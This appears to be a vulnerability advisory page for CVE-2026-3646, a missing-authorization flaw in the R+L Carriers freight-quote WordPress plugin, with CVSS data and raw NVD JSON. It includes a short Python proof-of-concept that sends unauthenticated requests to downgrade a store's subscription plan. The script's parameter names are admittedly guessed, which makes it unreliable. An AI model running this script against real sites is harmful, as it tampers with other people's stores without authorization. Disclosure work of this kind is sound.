Security Vulnerability Report
CVE-2026-3646 CVSS 5.3 MEDIUM

CVE-2026-3646

Published: 2026-04-08 05:16:06
Last Modified: 2026-04-27 19:04:23

Description

The LTL Freight Quotes – R+L Carriers Edition plugin for WordPress is vulnerable to Missing Authorization via the plugin's webhook handler in all versions up to, and including, 3.3.13. This is due to missing authentication, authorization, and nonce verification on a standalone PHP file that directly processes GET parameters and updates WordPress options. This makes it possible for unauthenticated attackers to modify the plugin's subscription plan settings, effectively downgrading the store from a paid plan to the Trial Plan, changing the store type, and manipulating subscription expiration dates, potentially disabling premium features such as Dropship and Hazardous Material handling.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

LTL Freight Quotes – R+L Carriers Edition <= 3.3.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
import requests


def exploit(target_url):
    # The vulnerable endpoint path based on the CVE description
    vuln_path = "/wp-content/plugins/ltl-freight-quotes-rl-edition/en-hit-to-update-plan.php"
    # Construct the full URL
    url = f"{target_url}{vuln_path}"
    # Payload parameters to downgrade the subscription plan
    # Parameter names inferred from typical plugin structures and description context
    payload = {
        "plan_type": "trial",
        "store_type": "standard",
        "expiry_date": "2025-01-01",
    }
    try:
        # Send unauthenticated GET request
        response = requests.get(url, params=payload, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request sent successfully to {url}")
            print(f"[+] Response: {response.text}")
            print("[+] Plugin settings may have been modified.")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    target = "http://example.com"  # Replace with target URL
    exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3646", "sourceIdentifier": "[email protected]", "published": "2026-04-08T05:16:06.130", "lastModified": "2026-04-27T19:04:22.650", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The LTL Freight Quotes – R+L Carriers Edition plugin for WordPress is vulnerable to Missing Authorization via the plugin's webhook handler in all versions up to, and including, 3.3.13. This is due to missing authentication, authorization, and nonce verification on a standalone PHP file that directly processes GET parameters and updates WordPress options. This makes it possible for unauthenticated attackers to modify the plugin's subscription plan settings, effectively downgrading the store from a paid plan to the Trial Plan, changing the store type, and manipulating subscription expiration dates, potentially disabling premium features such as Dropship and Hazardous Material handling."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/tags/3.3.11/en-hit-to-update-plan.php#L32", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/tags/3.3.11/en-hit-to-update-plan.php#L33", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/tags/3.3.11/en-hit-to-update-plan.php#L40", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/tags/3.3.11/en-hit-to-update-plan.php#L43", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/tags/3.3.11/en-hit-to-update-plan.php#L46", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/tags/3.3.11/en-hit-to-update-plan.php#L49", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/trunk/en-hit-to-update-plan.php#L32", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/trunk/en-hit-to-update-plan.php#L33", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/trunk/en-hit-to-update-plan.php#L40", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/trunk/en-hit-to-update-plan.php#L43", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/trunk/en-hit-to-update-plan.php#L46", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ltl-freight-quotes-rl-edition/trunk/en-hit-to-update-plan.php#L49", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3492361%40ltl-freight-quotes-rl-edition&new=3492361%40ltl-freight-quotes-rl-edition&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a144c9ae-dfdb-4ea2-8c27-84d59439c72a?source=cve", "source": "[email protected]"}]}}